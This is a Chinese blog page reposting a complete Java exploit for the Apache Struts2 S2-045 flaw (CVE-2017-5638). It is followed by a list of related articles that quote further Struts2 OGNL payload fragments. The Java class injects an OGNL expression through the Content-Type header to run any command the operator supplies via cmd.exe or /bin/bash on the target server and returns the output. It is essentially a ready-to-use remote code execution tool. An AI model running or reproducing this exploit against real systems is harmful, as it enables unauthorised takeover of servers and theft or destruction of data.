java poc_Struts2爆远程代码执行漏洞(S2-045 CVE-2017-5638),java版POC | 极安全-JiSec

最新推荐文章于 2022-08-11 09:26:24 发布
最新推荐文章于 2022-08-11 09:26:24 发布
阅读量119 收藏
点赞数
文章标签: java poc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39827775/article/details/114203180
版权

https://github.com/Mofree/SecurityTools/tree/master/script

package demo;

import java.io.BufferedReader;

import java.io.IOException;

import java.io.InputStream;

import java.io.InputStreamReader;

import java.net.HttpURLConnection;

import java.net.URL;

public class Stpoc {

public Stpoc() {

}

public static String getContext(URL url, String encode, String commend) {

StringBuffer contentBuffer = new StringBuffer();

boolean responseCode = true;

HttpURLConnection con = null;

try {

con = (HttpURLConnection)url.openConnection();

con.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36");

con.setRequestProperty("Content-Type", "%{(#nike=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\'" + commend + "\').(#iswin=(@java.lang.System@getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(#cmds=(#iswin?{\'cmd.exe\',\'/c\',#cmd}:{\'/bin/bash\',\'-c\',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}");

con.setConnectTimeout('\uea60');

con.setReadTimeout('\uea60');

int responseCode1 = con.getResponseCode();

if(responseCode1 == -1) {

System.out.println(url.toString());

con.disconnect();

} else {

if(responseCode1 < 400) {

InputStream e = con.getInputStream();

InputStreamReader istreamReader = new InputStreamReader(e, encode);

BufferedReader buffStr = new BufferedReader(istreamReader);

String str = null;

while((str = buffStr.readLine()) != null) {

contentBuffer.append(str);

}

e.close();

return contentBuffer.toString();

}

System.out.println(responseCode1);

con.disconnect();

}

} catch (IOException var13) {

var13.printStackTrace();

contentBuffer = null;

System.out.println(url.toString());

return contentBuffer.toString();

} finally {

con.disconnect();

}

return null;

}

public static String getHtmlContent(String url, String encode, String commend) {

if(!url.toLowerCase().startsWith("http://")) {

url = "http://" + url;

}

try {

URL e = new URL(url);

return getContext(e, encode, commend);

} catch (Exception var4) {

var4.printStackTrace();

return null;

}

}

public static void main(String[] args) {

if(args.length < 1) {

System.out.println("[!]Use : java \n");

System.out.println("[!]Affects Version: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\n");

System.out.println("[!]CVE ID : CVE-2017-5638\n");

System.out.println("[!]Reference : https://cwiki.apache.org/confluence/display/WW/S2-045\n");

System.exit(0);

} else {

String url = args[0];

String commend = args[1];

System.out.print(getHtmlContent(url, "utf-8", commend));

}

}

}

weixin_39827775
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Struts2 漏洞复现之s2-045
weixin_51220765的博客
12-14 2703
Struts2 漏洞复现之s2-045 原理: 在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。 影响本: Struts 2.3.5 - Struts 2.3.31 Struts 2.5 - Struts 2.5.10 1.进入045 cd vulhub-master/struts2/s2-045 2.开启045 docker-compose up -d
struts2 s2-045漏洞利用poc
isinstance的博客
03-10 6742
直接上代码了亲测有用 第一个是检测有没有这个漏洞的 import requestsimport sys def poc(url): payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#con
Struts2远程命令执行漏洞Struts2-048 Poc Shell及防御修复方案抢先看!
chengman3837的博客
07-08 235
漏洞概述 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。在Struts 2.3.x 系列的 Showcase 应用中演示Struts2整合Struts 1 的插件中存在...
【中间件】Struts2系列漏洞POC小结
weixin_30852367的博客
05-16 276
#Struts2-045 ''' CVE-2017-5638 影响范围:Struts 2.3.5 – Struts 2.3.31,Struts 2.5 – Struts 2.5.10 触发条件:基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行 利用方法:构造Content-type的值 测试POC: %{(#nike='multipart/form-...
[附POC]Apache Struts2最新(CVE-2017-5638,S02-45)POC
weixin_33806914的博客
03-08 302
#! /usr/bin/env python # encoding:utf-8 import urllib2 import sys from poster.encode import multipart_encode from poster.streaminghttp import register_openers def poc():     register_openers()     dat...
CVE-2017-3506-Poc.zip_CVE-2017-3506_CVE-2017-3506 poc_CVE-2017-3
09-24
2017年,Apache Struts2曝出一个严重的安全漏洞,即CVE-2017-3506,这个漏洞允许远程攻击者在未授权的情况下执行任意代码,从而对系统造成严重威胁。 **漏洞概述** CVE-2017-3506,又称为S2-048,是由于Struts2...
CVE-2017-9805-POC.py s2-052.py 批量检测脚本
最新发布
12-08
Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行...
Struts2 s2-061 Poc分析1
08-03
Struts2 s2-061 是一个关于 Apache Struts2 框架的安全漏洞,具体为 OGNL(Object-Graph Navigation Language)表达式注入导致的远程代码执行问题。这个漏洞CVE-2020-17530)在2020年12月8日被公开,影响了使用...
S2-057-poc
08-23
S2-057漏洞,也称为CVE-2018-11776,是Struts2框架中的一个严重安全漏洞,允许远程代码执行(RCE),可能导致攻击者能够完全控制受影响的系统。这个漏洞主要出现在Struts2的Struts REST插件中,当用户通过HTTP头发送...
CVE-2020-17530:S2-061 的payload,以及对应简单的PoCExp
04-25
S2-061脚本皆根据vulhub的struts2-059/061漏洞测试环境来写的,不具普遍性,还望大佬多多指教struts2-061-poc.py(可执行简单系统命令)用法:python struts2-061-poc.py command例子:python struts2-061-poc.py ...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
关于解决 Apache_Struts2漏洞(S2-045,CVE-2017-5638),包含说明与所需资源
S2-045Struts2远程命令执行漏洞(CVE-2017-5638)
热门推荐
Jaychouzzk
11-05 2万+
实验环境 操作机:Windows XP 目标机:Centos 6.5 Struts本:2.3.31 请访问http://file.ichunqiu.com/74tk6wy6下载实验文件 实验目的: 了解S2-045 Struts2远程命令执行漏洞危害 掌握检测修复S2-045 Struts2远程命令执行漏洞技术 实验文件: ...
S2-046 远程代码执行漏洞CVE-2017-5638
Stephen Wolf
11-05 3983
一、S2-046 远程代码执行漏洞CVE-2017-5638漏洞简介 Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。 影响本: Strut...
Struts2 S2-046漏洞复现 (CVE-2017-5638
1
05-27 3589
一:漏洞介绍 名称: struts2-046 远程代码执行CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
S2-045 Struts 2漏洞CVE-2017-5638) 实战
shylcok的博客
08-11 793
公司接到阿里云需要升级Struts 2的邮件,因为 我们公司用的 Struts 2本 有远程代码执行漏洞。但是 如果执行一些和文件,目录相关的操作 就会提示: 没有那个文件或目录。1.抓包,使用bp或者Charles都行 (我这使用Charles)现在可以执行查看路径等一些权限,但是还做不到删除,新增等一些操作。重要的是,下图中 Content-Type的内容 进行修改。2.改包(1.打断点2.repeat一下3修改需要修改的)当中的重点就是加粗字体:(#cmd='"ls"')......
S2-045 远程代码执行漏洞CVE-2017-5638
Stephen Wolf
11-04 8517
一、S2-045 远程代码执行漏洞CVE-2017-5638) 简述: Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大...
struts2-cve_2017_5638漏洞复现
0day
02-19 1812
struts2-cve_2017_5638漏洞 漏洞概述 Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 Apache Struts 2被曝存在远程命令执行漏洞漏洞编号S2-045CVE编号CVE-2017-5638,在使用基于Jakar.
【vulhub】Structs2 S2-045 远程代码执行漏洞CVE-2017-5638
weixin_42884199的博客
12-07 537
前言 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload payload1: Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data 在请求头插入上述payload 三、漏洞利用 payload2: Content-Type:
漫谈WebLogic-CVE-2020-25511
08-03
漏洞存在于Oracle WebLogic Server中,攻击者可以利用该漏洞在未授权的情况下远程执行恶意代码。此漏洞的威胁程度较高,并且被广泛利用,因此修复措施尤为重要。 不足之处 针对该漏洞的分析文章和POC已经在互联网...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值